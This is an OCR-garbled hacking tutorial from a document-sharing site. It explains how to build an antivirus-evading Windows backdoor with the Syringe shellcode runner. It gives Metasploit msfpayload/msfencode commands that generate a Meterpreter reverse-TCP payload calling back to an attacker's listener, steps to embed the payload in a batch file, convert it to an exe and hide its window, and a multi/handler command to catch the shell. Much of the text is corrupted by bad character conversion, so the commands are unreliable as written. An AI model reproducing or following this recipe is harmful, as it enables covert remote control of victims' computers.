Professional Documents
Culture Documents
"oday i am e#plaining a clever and relatively little known way to bypass antivirus without using any encoder. $ am using syringe for directly running my shell%code. "he method that this tool uses is opens a location in its address space with a call to &irtual'lloc with permissions of read( write( and e#ecute. &irual'lloc is a )indows specific call that reserves a region of memory with the specified permissions. "he read and write permissions are re*uired because the alpha numeric shell code will change itself as it is being e#ecuted. +yringe then copies the user supplied shellcode string into the resulting memory buffer from &irtual'lloc. inally( +yringe e#ecutes the shellcode via an 'ssembly stub that takes a pointer to the shell code as its only parameter before calling it. ,ne of the very nice features of this tool is that the stub used to e#ecute the shell code is wrapped in a +tructured E#ception Handler -+EH. block( allowing the program to e#ecute gracefully( even if the shellcode encounters an error.
/e*. % backdoor.bat -included in package( link below. i.vbs syringe.e#e 0akeE#e romBat.bat 12a.e#e 12sd.sf# metasploit -in backtrack( link below. opt. /esource hacker
3. irst we need to go and generate a payload we can copy and use in our backdoor. using this command
msfpayload windows!meterpreter!reverse4tcp E5$" 6789thread :;,/"9<<<< :H,+"93=>.3?@.33?.3 / A msfencode %a #@? %e #@?!alpha4mi#ed %t raw Buffer/egister9E'5
>. now copy the generated payload and paste it in the backdoor.bat and take care to replace the payload and not removing BC s.batB after it.
3. now open command prompt and run 0akeE#e romBat.bat with following arguments
<. 7ow run multi handler using this command msfcli multi!handler ;'D:,'E9windows!meterpreter!reverse4tcp E5$" 6hread :;,/"9<<<< :H,+"93=>.3?@.33?.3 E
if you wanna change icon and discription Iust use resource hacker-link below..
J: )hy i am not using batch to e#e converterK ': Everything you compile with it gets detected by some antivirus programs.
J: )hy i am using this vbs fileK ': Lust to hide the 80E window started by bat file. $ know there are better ways. :inks: 'll files: http:!!www.mediafire.com!Kkamwdi<ci=?c>*1 /esource hacker: Http:!!www.angusI.com!resourcehacker!reshack4setup.e#e 0etaspoit: www.metasploit.com
$nf0g33k